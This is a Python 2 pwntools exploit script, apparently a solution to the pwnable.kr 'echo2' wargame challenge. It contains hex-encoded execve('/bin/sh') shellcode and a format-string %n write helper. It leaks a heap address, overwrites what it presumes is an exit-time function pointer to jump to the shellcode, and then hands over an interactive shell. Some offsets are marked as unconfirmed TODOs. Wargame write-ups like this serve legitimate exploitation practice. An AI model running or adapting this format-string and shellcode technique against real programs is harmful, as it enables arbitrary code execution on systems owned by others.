#!/usr/bin/env python
# coding=utf8
from pwn import u64, process, remote, shellcraft, context, asm
context.arch = 'amd64'

# .bss address that the first format-string write plants as a pointer; the
# leak step then reads the 8 bytes stored there back out.
bss_o = 0x602098

# Local binary by default; switch to one of the remote targets to run it live.
p = process('./echo2')
# p = remote('pwnable.kr', 9011)
# p = remote('localhost', 9011)

# Pre-assembled x86-64 execve("/bin///sh", NULL, NULL) shellcode (24 bytes).
# The equivalent pwntools build would be asm(shellcraft.sh()).
# NOTE: str.decode('hex') is Python 2 only; Python 3 needs binascii.unhexlify.
SHELLCODE_HEX = '6a6848b82f62696e2f2f2f73504889e731f66a3b58990f05'
payload = SHELLCODE_HEX.decode('hex')


def fmt_write(value, arg_index):
    """Build a printf format string that stores `value` through the pointer
    held in positional argument `arg_index` using %n.

    `%<value>c` pads the output to `value` bytes so printf's byte counter equals
    the value to write. %n stores a 4-byte int, so `value` must fit in 32 bits,
    and the target emits `value` bytes of output — multi-megabyte for heap or
    .bss addresses, which is slow over a network link.
    """
    return '%%%dc%%%d$n' % (value, arg_index)


def echo_via_menu(line):
    """Select menu item 2 and submit `line` as the echoed input; returns the
    first response line (the echo), which callers usually discard."""
    p.recvuntil('>')
    p.sendline('2')
    p.sendline(line)
    return p.recvline()


# The first prompt takes the shellcode as-is; it is assumed to land in a heap
# buffer whose address is leaked below — TODO confirm against the binary.
p.sendline(payload)

# --- leak malloc_o -------------------------------------------------------
# Plant bss_o through arg 10, then dereference arg 18 with %s. This relies on
# arg 10 pointing at the stack slot that printf sees as arg 18 — verify the
# offsets in a debugger if the binary changes.
echo_via_menu(fmt_write(bss_o, 10))
echo_via_menu('%18$s')
# %s stops at the first NUL, so the echoed pointer may be shorter than 8 bytes;
# pad with NULs before unpacking. A pointer containing 0x0a would be truncated
# by recvline() and silently mis-parsed here.
leaked = p.recvline()[:-1]
malloc_o = u64(leaked.ljust(8, '\x00'))
print(hex(malloc_o))

# --- modify byebye ---------------------------------------------------------
# Point arg 18 at malloc_o + 0x20, then store malloc_o there: the heap slot at
# offset 0x20 is presumably the function pointer the program calls on exit
# ("byebye"), redirected to the shellcode buffer — TODO confirm offset.
echo_via_menu(fmt_write(malloc_o + 0x20, 10))
echo_via_menu(fmt_write(malloc_o, 18))

# Drain whatever is still buffered (the padding output) and hand over the shell.
p.clean()
p.interactive()